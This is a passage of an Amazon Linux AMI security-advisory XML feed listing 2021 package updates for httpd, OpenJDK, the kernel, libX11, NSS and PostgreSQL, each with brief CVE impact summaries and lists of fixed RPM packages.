1966732: CVE-2021-26691 httpd: Heap overflow in mod_session
CVE-2021-26690:
A NULL pointer dereference was found in Apache httpd mod_session. The highest threat from this vulnerability is to system availability.
1966729: CVE-2021-26690 httpd: mod_session NULL pointer dereference in parser
CVE-2020-35452:
A flaw was found in Apache httpd. The mod_auth_digest has a single zero byte stack overflow. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1966724: CVE-2020-35452 httpd: Single zero byte stack overflow in mod_auth_digest
CVE-2020-13950:
A flaw was found in Apache httpd. The mod_proxy module has a NULL pointer dereference. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1966738: CVE-2020-13950 httpd: mod_proxy NULL pointer dereference
CVE-2020-13938:
A flaw was found in HTTPd. In some Apache HTTP Server versions, unprivileged local users can stop HTTPd on Windows. The highest threat from this vulnerability is to system availability.
1970006: CVE-2020-13938 httpd: Improper Handling of Insufficient Privileges
CVE-2019-17567:
A flaw was found in Apache httpd. The mod_proxy_wstunnel module tunnels non-upgraded connections.
1966740: CVE-2019-17567 httpd: mod_proxy_wstunnel tunneling of non Upgraded connection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17567" title="" id="CVE-2019-17567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13938" title="" id="CVE-2020-13938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13950" title="" id="CVE-2020-13950" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35452" title="" id="CVE-2020-35452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26690" title="" id="CVE-2021-26690" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26691" title="" id="CVE-2021-26691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30641" title="" id="CVE-2021-30641" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.48" release="1.92.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.48" release="1.92.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.48" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.48-1.92.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.48" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.48" release="1.92.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.48-1.92.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.48" release="1.92.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.48" release="1.92.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.48" 
release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.48-1.92.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.48" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.48-1.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1515</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1515: medium priority package update for java-1.8.0-openjdk</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-2163:
Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N).
1951217: CVE-2021-2163 OpenJDK: Incomplete enforcement of JAR signing disabled algorithms (Libraries, 8249906)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2163" title="" id="CVE-2021-2163" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-src" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.292.b10-1.63.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.292.b10-1.63.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.292.b10-1.63.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.292.b10" 
release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.292.b10" release="1.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.292.b10-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1516</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1516: medium priority package update for kernel</title><issued date="2021-07-08 18:38:00" /><updated date="2024-04-25 16:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-46938:
In the Linux kernel, the following vulnerability has been resolved:
dm rq: fix double free of blk_mq_tag_set in dev remove after table load fails
CVE-2021-33200:
A flaw was found in kernel/bpf/verifier.c in BPF in the Linux kernel. An incorrect limit is enforced for pointer arithmetic operations which can be abused to perform out-of-bounds reads and writes in kernel memory, leading to local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-29650:
A denial-of-service (DoS) flaw was identified in the Linux kernel due to an incorrect memory barrier in xt_replace_table in net/netfilter/x_tables.c in the netfilter subsystem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29650" title="" id="CVE-2021-29650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33200" title="" id="CVE-2021-33200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46938" title="" id="CVE-2021-46938" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package 
name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.238" release="125.421.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1517</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1517: important priority package update for libX11</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31535:
A missing validation flaw was found in libX11. This flaw allows an attacker to inject X11 protocol commands on X clients and, in some cases, also bypass authentication (via injection of control characters) or potentially execute arbitrary code with the permissions of the application compiled with libX11. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.
1961822: CVE-2021-31535 libX11: missing request length checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31535" title="" id="CVE-2021-31535" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.14.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.14.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.14.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1518</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1518: medium priority package update for nss</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:53:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25648:
A flaw was found in the way NSS handled CCS (ChangeCipherSpec) messages in TLS 1.3. This flaw allows a remote attacker to send multiple CCS messages, causing a denial of service for servers compiled with the NSS library. The highest threat from this vulnerability is to system availability.
1887319: CVE-2020-25648 nss: TLS 1.3 CCS flood remote DoS Attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25648" title="" id="CVE-2020-25648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.85.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-pkcs11-devel-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.53.1-7.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1519</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1519: important priority package update for postgresql92</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25695:
A flaw was found in postgresql. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894425: CVE-2020-25695 postgresql: Multiple features escape "security restricted operation" sandbox
CVE-2020-25694:
A flaw was found in postgresql. If a client application that creates additional database connections only reuses the basic connection parameters while dropping security-relevant parameters, an opportunity for a man-in-the-middle attack, or the ability to observe clear-text transmissions, could exist. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894423: CVE-2020-25694 postgresql: Reconnection can downgrade connection security settings
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25694" title="" id="CVE-2020-25694" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25695" title="" id="CVE-2020-25695" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" 
version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.67.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1520</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1520: important priority package update for postgresql96</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-32027:
A flaw was found in postgresql. While modifying certain SQL array values, missing bounds checks let authenticated database users write arbitrary bytes to a wide area of server memory. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1956876: CVE-2021-32027 postgresql: Buffer overrun from integer overflow in array subscripting calculations
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32027" title="" id="CVE-2021-32027" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-plpython27" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.22" release="1.85.amzn1" epoch="0" 
